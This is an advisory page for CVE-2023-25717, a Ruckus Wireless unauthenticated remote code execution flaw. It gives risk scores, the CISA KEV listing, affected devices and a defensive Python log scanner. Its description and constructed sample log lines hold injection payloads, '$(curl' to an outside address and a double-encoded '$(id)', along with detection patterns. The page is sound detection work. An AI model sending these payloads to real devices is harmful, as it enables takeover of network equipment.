Multiple Ruckus Wireless Products CSRF and RCE Vulnerability
Summary
| CVE | CVE-2023-25717 |
|---|---|
| State | PUBLIC |
| Assigner | [email protected] |
| Source Priority | CVE Program / NVD first with legacy fallback |
| Published | 2023-02-13 20:15:00 UTC |
| Updated | 2023-02-23 16:26:00 UTC |
| Description | Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET request, as demonstrated by a request containing the substring `/forms/doLogin?login_username=admin&password=password$(curl`. |
Risk And Classification
EPSS: probability 0.94239, percentile 0.99927 (scored 2026-04-03)
CISA KEV: listed 2023-05-12; remediation due 2023-06-02; known ransomware use: Unknown
Problem Types: CWE-94
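The description above gives the shape of the injection: an unauthenticated GET to `/forms/doLogin` whose `password` parameter carries a shell command substitution (`$(...)`), which the device evaluates (CWE-94). A practical check for a defender is to scan the web access logs of any device in the affected list for that pattern. The script below is an added example written for this page, not code from Ruckus or from the CYBIR proof of concept; the endpoint, parameter names and `$(` shape come from the CVE description, while the Common Log Format parsing, the metacharacter list and the sample log lines are the editor's own assumptions and constructed test data.

```python
"""Scan web-server access logs for CVE-2023-25717-style command-substitution
payloads aimed at /forms/doLogin.

Added example for this advisory page; not Ruckus code. Facts taken from the
CVE description: the /forms/doLogin endpoint, the login_username/password
parameters and the "$(" command-substitution form. Everything else (log
format, metacharacter list, sample lines) is assumed or constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOGIN_PATH = "/forms/doLogin"

# Shell command-substitution / expansion forms. Kept narrow on purpose: a
# broader list (";", "|", "&&") would also flag ordinary passwords.
SUSPICIOUS = re.compile(r"\$\(|`|\$\{|\n")

# Common Log Format (assumed): host ident authuser [ts] "METHOD target proto" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not captured traffic). 198.51.100.0/24 is a
# documentation range.
LOG_LINES = [
    '10.0.0.5 - - [13/Feb/2023:20:15:01 +0000] "GET /forms/doLogin?login_username=admin'
    '&password=password%24%28curl+http%3A%2F%2F198.51.100.7%2Fx%29 HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Feb/2023:20:16:11 +0000] "POST /forms/doLogin HTTP/1.1" 302 0',
    '10.0.0.9 - - [13/Feb/2023:20:17:00 +0000] "GET /forms/doLogin?login_username=admin'
    '&password=S3cret%21 HTTP/1.1" 200 512',
    '10.0.0.12 - - [13/Feb/2023:20:18:30 +0000] "GET /admin/dashboard.jsp HTTP/1.1" 200 9000',
    # double-encoded $(id): %2524%2528id%2529 -> %24%28id%29 -> $(id)
    '10.0.0.5 - - [13/Feb/2023:20:19:45 +0000] "GET /forms/doLogin?login_username=admin'
    '&password=%2524%2528id%2529 HTTP/1.1" 200 512',
]


def decode_params(query):
    """Split a query string and decode each value twice.

    parse_qsl removes one layer of percent-encoding; the extra unquote()
    catches payloads that were double-encoded to slip past a naive "$(" match.
    """
    return [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def classify_request(method, target):
    """Return a reason string if the request looks like an injection attempt
    against the login form, else None."""
    parts = urlsplit(target)
    if parts.path != LOGIN_PATH:
        return None
    for key, value in decode_params(parts.query):
        if SUSPICIOUS.search(value):
            return f"{method} {LOGIN_PATH}: command substitution in {key!r}: {value!r}"
    return None


def scan_log(lines):
    """Return (host, timestamp, reason) for every suspicious line."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not CLF; a real deployment would log and skip
        reason = classify_request(m["method"], m["target"])
        if reason:
            hits.append((m["host"], m["ts"], reason))
    return hits


if __name__ == "__main__":
    for host, ts, reason in scan_log(LOG_LINES):
        print(f"{ts} {host} {reason}")
```

Run against the constructed lines, the scan flags the two requests from 10.0.0.5 (the plain `$(curl ...)` payload and the double-encoded `$(id)`), and ignores the normal login and the dashboard request. Only GET requests are visible this way; if the device logs POST bodies nowhere, the same check belongs on a reverse proxy or IDS in front of the management interface, and a hit should be treated as a likely compromise of a device that is on the CISA KEV list, not merely a scan.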
CISA Known Exploited Vulnerability
| Vendor | Ruckus Wireless |
|---|---|
| Product | Multiple Products |
| Name | Multiple Ruckus Wireless Products CSRF and RCE Vulnerability |
| Required Action | Apply updates per vendor instructions or disconnect product if it is end-of-life. |
| Notes | https://support.ruckuswireless.com/security_bulletins/315; https://nvd.nist.gov/vuln/detail/CVE-2023-25717 |
NVD Known Affected Configurations (CPE 2.3)
| Type | Vendor | Product | Version | Update | Edition | Language |
|---|---|---|---|---|---|---|
| Hardware | Ruckuswireless | E510 | - | All | All | All |
| Hardware | Ruckuswireless | H320 | - | All | All | All |
| Hardware | Ruckuswireless | H350 | - | All | All | All |
| Hardware | Ruckuswireless | H500 | - | All | All | All |
| Hardware | Ruckuswireless | H510 | - | All | All | All |
| Hardware | Ruckuswireless | H550 | - | All | All | All |
| Hardware | Ruckuswireless | M510 | - | All | All | All |
| Hardware | Ruckuswireless | M510-jp | - | All | All | All |
| Hardware | Ruckuswireless | P300 | - | All | All | All |
| Hardware | Ruckuswireless | Q410 | - | All | All | All |
| Hardware | Ruckuswireless | Q710 | - | All | All | All |
| Hardware | Ruckuswireless | Q910 | - | All | All | All |
| Hardware | Ruckuswireless | R300 | - | All | All | All |
| Hardware | Ruckuswireless | R310 | - | All | All | All |
| Hardware | Ruckuswireless | R320 | - | All | All | All |
| Hardware | Ruckuswireless | R350 | - | All | All | All |
| Hardware | Ruckuswireless | R500 | - | All | All | All |
| Hardware | Ruckuswireless | R510 | - | All | All | All |
| Hardware | Ruckuswireless | R550 | - | All | All | All |
| Hardware | Ruckuswireless | R560 | - | All | All | All |
| Hardware | Ruckuswireless | R600 | - | All | All | All |
| Hardware | Ruckuswireless | R610 | - | All | All | All |
| Hardware | Ruckuswireless | R650 | - | All | All | All |
| Hardware | Ruckuswireless | R700 | - | All | All | All |
| Hardware | Ruckuswireless | R710 | - | All | All | All |
| Hardware | Ruckuswireless | R720 | - | All | All | All |
| Hardware | Ruckuswireless | R730 | - | All | All | All |
| Hardware | Ruckuswireless | R750 | - | All | All | All |
| Hardware | Ruckuswireless | R760 | - | All | All | All |
| Hardware | Ruckuswireless | R850 | - | All | All | All |
| Application | Ruckuswireless | Ruckus Wireless Admin | All | All | All | All |
| Operating System | Ruckuswireless | Smartzone | All | All | All | All |
| Operating System | Ruckuswireless | Smartzone | 6.1.0.0.935 | All | All | All |
| Operating System | Ruckuswireless | Smartzone Ap | All | All | All | All |
| Hardware | Ruckuswireless | Sz-144 | - | All | All | All |
| Hardware | Ruckuswireless | Sz-144-federal | - | All | All | All |
| Hardware | Ruckuswireless | Sz100 | - | All | All | All |
| Hardware | Ruckuswireless | Sz300 | - | All | All | All |
| Hardware | Ruckuswireless | Sz300-federal | - | All | All | All |
| Hardware | Ruckuswireless | T300 | - | All | All | All |
| Hardware | Ruckuswireless | T301n | - | All | All | All |
| Hardware | Ruckuswireless | T301s | - | All | All | All |
| Hardware | Ruckuswireless | T310c | - | All | All | All |
| Hardware | Ruckuswireless | T310d | - | All | All | All |
| Hardware | Ruckuswireless | T310n | - | All | All | All |
| Hardware | Ruckuswireless | T310s | - | All | All | All |
| Hardware | Ruckuswireless | T350c | - | All | All | All |
| Hardware | Ruckuswireless | T350d | - | All | All | All |
| Hardware | Ruckuswireless | T350se | - | All | All | All |
| Hardware | Ruckuswireless | T504 | - | All | All | All |
| Hardware | Ruckuswireless | T610 | - | All | All | All |
| Hardware | Ruckuswireless | T710 | - | All | All | All |
| Hardware | Ruckuswireless | T710s | - | All | All | All |
| Hardware | Ruckuswireless | T750 | - | All | All | All |
| Hardware | Ruckuswireless | T750se | - | All | All | All |
| Hardware | Ruckuswireless | T811-cm | - | All | All | All |
| Hardware | Ruckuswireless | T811-cmnon-spf | - | All | All | All |
| Hardware | Ruckuswireless | Zd1000 | - | All | All | All |
| Hardware | Ruckuswireless | Zd1100 | - | All | All | All |
| Hardware | Ruckuswireless | Zd1200 | - | All | All | All |
| Hardware | Ruckuswireless | Zd3000 | - | All | All | All |
| Hardware | Ruckuswireless | Zd5000 | - | All | All | All |
References
| Reference | Source | Link | Tags |
|---|---|---|---|
| Proof of Concept - Ruckus Wireless Admin (=<10.4 - Unauthenticated Remote Code Execution / CSRF / SSRF) - CYBIR - Cyber Security, Incident Response, & Digital Forensics | MISC | cybir.com | |
| 20230208 - Security Bulletins - Ruckus Wireless Support | MISC | support.ruckuswireless.com | |
| CVE Program record | CVE.ORG | www.cve.org | canonical |
| NVD vulnerability detail | NVD | nvd.nist.gov | canonical, analysis |
| CISA Known Exploited Vulnerabilities catalog | CISA | www.cisa.gov | kev |
No vendor comments have been submitted for this CVE.
Legacy QID Mappings
- 731238 Multiple Ruckus Wireless Products CSRF and RCE Vulnerabilities